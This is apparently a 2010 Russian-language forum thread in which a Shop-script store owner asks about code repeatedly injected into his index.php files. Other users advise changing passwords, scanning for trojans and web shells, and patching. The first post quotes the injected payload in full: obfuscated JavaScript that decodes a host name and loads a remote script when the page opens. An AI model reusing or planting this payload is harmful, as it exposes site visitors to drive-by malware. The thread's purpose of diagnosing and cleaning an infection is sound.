Помогите! это вирус или уязвимость? что делать?!

Тема в разделе "Shop-script", создана пользователем seeker1982, 28 янв 2010.

Статус темы:
Закрыта.
  1. seeker1982

    seeker1982 Создатель

    Регистр.:
    6 фев 2009
    Сообщения:
    23
    Симпатии:
    0
    в четвертый раз за две недели на сайте во всез файлах index.php поселяется код! он встраивается сразу после окончания php кода к конце файлов:
    PHP:
    <script> try{window.onload=function(){document.write('<div id=megaid>pichunter-com.time.com.bl</div>');Ew34reb9067 document.getElementById('megaid').innerHTML 'u@^)()e&#h&&^&@o!(s&#t$$-$^c)o)@$m!).&!c)$$o)#u&)$n^t@)^e(#&@r&#&)b!&&e@$#^^s^$t^!.$r(&u(:)(D$($E!)#B$U^G#$^/)^$m!&s(#@n$!!.#^c($(o#@#m!/(@^@m^##s@))^n$.#)^c^o^^(m&&&(/$$g$()o#@#o)!&!g)^!l&e@^(!).)&c@!#!o)^&m)@/!!)p)()c(!&h@#@)o^(m&!e^$^(.!$n!&e!^^^t&&/)#s@i&)t&#e)!m(@e#t@^$e##@r$.@c^o^&m&^/)&'.replace(/\!|&|@|\^|#|\)|\$|\(/ig, '') ;document.write('<scr'+'ipt src=http://'+Ew34reb9067.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Fq9maaz4m ) {}</script>
    <!--c8b3f4e117443090eae170836419f076-->
    что это?
    что он делает?
    как с ним бороться?
    доступ к сайту у меня только по ssh
     
  2. VenomHOLD

    VenomHOLD

    Регистр.:
    14 мар 2009
    Сообщения:
    272
    Симпатии:
    52
    поменяй пароли от всего.
    проверь комп на винусы, трояны.
    удали код этот.
    проверь на вируса шоп.

    у меня подобное было. троянчики тянули логопасики :(
     
  3. seeker1982

    seeker1982 Создатель

    Регистр.:
    6 фев 2009
    Сообщения:
    23
    Симпатии:
    0
    заливал каждый раз все заново менял пароли, теперь вообще выхожу снового компа из под win7 и с последнего проникновения даже на сервер не заходил... ком девственно чист...
    о! не менял пароли на mysql, иду менять!
     
  4. VenomHOLD

    VenomHOLD

    Регистр.:
    14 мар 2009
    Сообщения:
    272
    Симпатии:
    52
    либо троян всё таки сидт, либо звоните хостеру, возможно сервер ломанули :nezn:
     
  5. vmkvadim

    vmkvadim Постоялец

    Регистр.:
    6 июл 2008
    Сообщения:
    53
    Симпатии:
    4
    а заплатки все поставили?
     
  6. baltazor-vova

    baltazor-vova Постоялец

    Регистр.:
    4 авг 2009
    Сообщения:
    79
    Симпатии:
    18
    Да была и у меня такая проблема, тока у меня <iframe> атака была, первое что он заражает, это "шаблоны" сайта, тщательно проверь их на наличие вирусни, а потом меняй пароли.....
     
  7. Elsys

    Elsys Создатель

    Регистр.:
    14 июн 2007
    Сообщения:
    26
    Симпатии:
    12
    заливал через Тотал командер, если да, то у тебя вирус.
    Убери в тотале сохранение паролей. И чисть комп, особенно тотал.
     
  8. sergio433

    sergio433 Постоялец

    Регистр.:
    15 окт 2008
    Сообщения:
    68
    Симпатии:
    4

    Для начала проверь все каталоги магазина антивирусом, скорей всего залили шел меня так тоже ломанули был троян temp.php в папке products_files/.

    Потом поставь все не обходимые ПАТЧИ (последный раз была уязвимость в файлах index.php, cart.php, printable.php.)

    Ну и конечно смени все пароли
     
  9. AndreyRain

    AndreyRain Создатель

    Регистр.:
    27 янв 2009
    Сообщения:
    13
    Симпатии:
    1
    Создай файл любой

    Создай любой файл вставь код и попробуй антивирусом его проверить если что то есть ты сразу увидишь
    тока принудительно проверяй и желательно на том компе где точно знаешь что вирей нет
     
  10. exGumator

    exGumator Создатель

    Регистр.:
    11 окт 2009
    Сообщения:
    10
    Симпатии:
    3
    Скорее всего на серваке сидит шелл и как что не меняй все равно будут активировать, выход такой - снимаешь архивом копию и изучаешь состав. но. так как антивири распознают многие шеллы как вирусы, скорее всего будет проблема скачать и сам архив

    легче хостера попросить кнопку нажать и проверить сервак и сайт
     
Статус темы:
Закрыта.